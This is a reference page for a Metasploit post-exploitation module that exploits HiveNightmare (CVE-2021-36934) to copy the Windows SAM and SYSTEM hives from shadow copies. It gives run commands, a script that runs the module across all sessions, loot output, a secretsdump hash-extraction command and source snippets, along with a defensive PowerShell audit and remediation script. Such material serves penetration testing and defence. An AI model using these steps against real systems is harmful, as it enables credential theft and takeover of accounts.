Windows SAM secrets leak - HiveNightmare - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/windows_sam_hivenightmare Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows SAM secrets leak - HiveNightmare
Module: post/windows/gather/credentials/windows_sam_hivenightmare
Source code: modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
Disclosure date: 2021-07-20
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-36934

This module is also known as HiveNightmare or SeriousSAM.

Due to overly permissive access rights on the SAM and SYSTEM hives in Windows 10, an unprivileged user is able to read those files. Because the hives are locked while Windows is running, they cannot be read directly; the module instead reads them through a Volume Shadow Copy, which is generally enabled, to obtain read access. Once the SAM and SYSTEM files are successfully dumped and stored with store_loot, you can dump the hashes with an external script such as secretsdump.py.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/windows_sam_hivenightmare

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/windows_sam_hivenightmare
msf post(windows_sam_hivenightmare) > show options
    ... show and set options ...
msf post(windows_sam_hivenightmare) > set SESSION session-id
msf post(windows_sam_hivenightmare) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/windows_sam_hivenightmare")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


Description

Due to overly permissive access rights on the SAM and SYSTEM hives in Windows 10, an unprivileged user is able to read those files. Because the hives are locked while Windows is running, they cannot be read directly; the module instead reads them through a Volume Shadow Copy, which is generally enabled, to obtain read access. Once the SAM and SYSTEM files are successfully dumped and stored with store_loot, you can dump the hashes with an external script such as secretsdump.py.

Installation

VSS is probably already enabled on your Windows 10 host. If you want to be sure, follow the steps below:

  • Open the control panel
  • Navigate to System and Security > System
  • Select System Protection from the column on the left
  • Check in the Protection Settings list whether protection is enabled for the drive
  • Optionally, select Create to "Create a restore point right now..."
    • This is necessary if the module cannot find an existing Shadow Copy, which can be the case if the Windows instance is brand new

Be aware that you need Administrator privileges to follow these steps. You can read more here.
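The following PowerShell script is an added example, not the module's own code or part of its documentation. A defender can run it on a Windows 10 host to check for the two conditions the module relies on: a BUILTIN\Users read entry on the live SAM and SYSTEM hives, and existing Volume Shadow Copies that preserve a readable copy of them. It also wraps Microsoft's published workaround for CVE-2021-36934 (re-enabling ACL inheritance on the config directory and deleting existing shadow copies). The function names are this example's own; it assumes an elevated prompt and the default %SystemRoot% layout.

```powershell
# Added example, not part of the Metasploit module or its documentation.
# Audits a Windows 10 host for the condition this module relies on
# (CVE-2021-36934): non-administrators holding read access on the SAM and
# SYSTEM hives, combined with Volume Shadow Copies that expose older copies
# of those files. Run from an elevated PowerShell prompt. Function names
# are this example's own; the icacls/vssadmin commands are Microsoft's
# published workaround for the CVE.

function Test-HiveAclExposure {
    param(
        [string[]] $Hives = @(
            "$env:SystemRoot\System32\config\SAM",
            "$env:SystemRoot\System32\config\SYSTEM"
        )
    )
    foreach ($hive in $Hives) {
        # Get-Acl reads only the security descriptor, so it works even though
        # the hive itself is locked by the kernel while Windows is running.
        $acl = Get-Acl -LiteralPath $hive
        $readRight = [System.Security.AccessControl.FileSystemRights]::Read
        # The vulnerable configuration is an Allow ACE that grants BUILTIN\Users
        # (every interactive user) at least Read on the hive.
        $weak = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference.Value -match '^BUILTIN\\Users$' -and
            (($_.FileSystemRights -band $readRight) -ne 0)
        }
        [pscustomobject]@{
            Hive     = $hive
            Exposed  = [bool] $weak
            WeakAces = @($weak | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
        }
    }
}

function Get-ShadowCopyInventory {
    # Each Win32_ShadowCopy instance corresponds to one
    # \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<n> device, which is the
    # path family the module opens. Snapshots taken before the ACL was fixed
    # still contain readable hive copies, so their creation dates matter.
    Get-CimInstance -ClassName Win32_ShadowCopy |
        Select-Object ID, DeviceObject, VolumeName, InstallDate
}

function Repair-HiveExposure {
    param([switch] $DeleteShadowCopies)
    # Re-enabling inheritance on the config directory contents removes the
    # stray BUILTIN\Users read ACE from the live hives.
    icacls "$env:SystemRoot\System32\config\*.*" /inheritance:e
    if ($DeleteShadowCopies) {
        # Existing snapshots keep the old ACL, so they must go too. This also
        # removes System Restore points; create a fresh restore point afterwards.
        vssadmin delete shadows "/for=$env:SystemDrive" /Quiet
    }
}

# Report the current state of this host.
$hives = Test-HiveAclExposure
$hives | Format-Table -AutoSize
$shadows = @(Get-ShadowCopyInventory)
Write-Host "Shadow copies present: $($shadows.Count)"
$shadows | Format-Table -AutoSize
if (($hives | Where-Object Exposed) -and $shadows.Count -gt 0) {
    Write-Warning 'Live hives are readable by BUILTIN\Users and shadow copies exist; run Repair-HiveExposure -DeleteShadowCopies.'
}
```

Fixing the live ACL alone is not sufficient: a snapshot taken while the weak entry was in place remains readable through its HarddiskVolumeShadowCopy<index> device until that snapshot is deleted, which is why the inventory lists each copy's creation date. Deleting shadow copies also discards System Restore points, so the remediation function makes that step opt-in.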

Verification Steps


  1. Start msfconsole
  2. use post/windows/gather/credentials/windows_sam_hivenightmare
  3. set ITERATIONS <number> to specify how many Shadow Copy file indexes to try (default is 10)
  4. optionally set FILE_INDEX <number> to target a specific file index instead of iterating over all indexes in the range
  5. run the module to exploit the vulnerability and, if successful, leak the SAM and SYSTEM files

Options


ITERATIONS

Set ITERATIONS to specify how many Shadow Copy file indexes the module iterates over. Windows exposes those files under the device name HarddiskVolumeShadowCopy<index>. By default, the module brute-forces that index by trying every value between 0 and 10; change this if needed.

FILE_INDEX

Set FILE_INDEX to target a specific Shadow Copy index instead of the default behaviour, which brute-forces every index in the given range.

Scenarios


This module was successfully tested on Windows 10 20H2. See the following output:

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > run

[+] SAM data found in HarddiskVolumeShadowCopy1!
[+] Retrieving files of index 1 as they are the most recently modified...
[+] SAM data saved at /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[+] SYSTEM data saved at /home/smcintyre/.msf4/loot/20210729113926_default_192.168.159.15_windows.system_202176.bin
[+] SAM and SYSTEM data were leaked!
[*] Post module execution completed
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[*] exec: file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin

/home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin: MS Windows registry file, NT/2000 or above
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) >

Then you can dump the hashes from the leaked files, for instance with secretsdump.py:

python3 secretsdump.py -sam <SAM_FILE> -system <SYSTEM_FILE> LOCAL


Msfconsole Usage


Here is how the windows/gather/credentials/windows_sam_hivenightmare post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/windows_sam_hivenightmare

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show info

       Name: Windows SAM secrets leak - HiveNightmare
     Module: post/windows/gather/credentials/windows_sam_hivenightmare
   Platform: Windows
       Arch: 
       Rank: Normal
  Disclosed: 2021-07-20

Provided by:
  Kevin Beaumont
  romarroca
  Yann Castel (yann.castel[at]orange.com)

Module stability:
 crash-safe

Compatible session types:
  Meterpreter

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  FILE_INDEX                   no        Optional index parameter to retrieve a specific Shadow Copy file
  ITERATIONS  10               yes       Number of iterations on Shadow Copy file index
  SESSION                      yes       The session to run this module on.

Description:
  Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is 
  possible for an unprivileged user to read those files. But, as they 
  are locked while Windows is running we are not able to read them 
  directly. The trick is to take advantage of Volume Shadow Copy, 
  which is generally enabled, to finally have a read access. Once SAM 
  and SYSTEM files are successfully dumped and stored in `store_loot`, 
  you can dump the hashes with some external scripts like 
  secretsdump.py

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-36934
  https://github.com/GossiTheDog/HiveNightmare
  https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652
  https://github.com/romarroca/SeriousSam

Also known as:
  HiveNightmare
  SeriousSAM

Module Options


This is a complete list of options available in the windows/gather/credentials/windows_sam_hivenightmare post exploitation module:

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show options

Module options (post/windows/gather/credentials/windows_sam_hivenightmare):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FILE_INDEX                   no        Optional index parameter to retrieve a specific Shadow Copy file
   ITERATIONS  10               yes       Number of iterations on Shadow Copy file index
   SESSION                      yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/windows_sam_hivenightmare post exploitation module:

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show advanced

Module advanced options (post/windows/gather/credentials/windows_sam_hivenightmare):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/windows_sam_hivenightmare module can do:

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/windows_sam_hivenightmare post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

GetLastError


Here is a relevant code snippet related to the "GetLastError" error message:

    ])
  end

  def check_path(path)
    r = session.railgun.kernel32.CreateFileA(path, 'GENERIC_READ', 0x3, nil, 'OPEN_EXISTING', 'FILE_ATTRIBUTE_NORMAL', nil)
    if r['GetLastError'] == 0
      return r['return']
    end

    nil
  end

Can't open SYSTEM file!


Here is a relevant code snippet related to the "Can't open SYSTEM file!" error message:

      read_file(sam_handle)
    )
    print_good("SAM data saved at #{path}")

    handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{index}\\Windows\\System32\\config\\SYSTEM")
    fail_with(Failure::UnexpectedReply, "Can't open SYSTEM file!") unless handle
    path = store_loot(
      'windows.system',
      '',
      session,
      read_file(handle)

Please specify a non-negative file index!


Here is a relevant code snippet related to the "Please specify a non-negative file index!" error message:

    print_good('SAM and SYSTEM data were leaked!')
  end

  def run
    if datastore['FILE_INDEX']
      fail_with(Failure::BadConfig, 'Please specify a non-negative file index!') unless datastore['FILE_INDEX'] >= 0

      handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{datastore['FILE_INDEX']}\\Windows\\System32\\config\\SAM")
      if handle
        print_good("SAM data found in HarddiskVolumeShadowCopy#{i}!")
        print_good("Retrieving files of index #{index_most_recent_shadow_copy}...")

Please specify an iteration number greater than 0!


Here is a relevant code snippet related to the "Please specify an iteration number greater than 0!" error message:

        print_good("SAM data found in HarddiskVolumeShadowCopy#{i}!")
        print_good("Retrieving files of index #{index_most_recent_shadow_copy}...")
        loot_files(handle, datastore['FILE_INDEX'])
      end
    else
      fail_with(Failure::BadConfig, 'Please specify an iteration number greater than 0!') unless datastore['ITERATIONS'] > 0

      most_recent_time = nil
      most_recent_shadow_copy = nil
      index_most_recent_shadow_copy = -1


No Shadow Copy files were found! Maybe you can try again with a greater iteration number...


Here is a relevant code snippet related to the "No Shadow Copy files were found! Maybe you can try again with a greater iteration number..." error message:

      end

      if index_most_recent_shadow_copy != -1
        print_good("Retrieving files of index #{index_most_recent_shadow_copy} as they are the most recently modified...")
        loot_files(most_recent_shadow_copy, index_most_recent_shadow_copy)
      else
        print_error('No Shadow Copy files were found! Maybe you can try again with a greater iteration number...')
      end
    end
  end
end


Authors


  • Kevin Beaumont
  • romarroca
  • Yann Castel (yann.castel[at]orange.com)

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
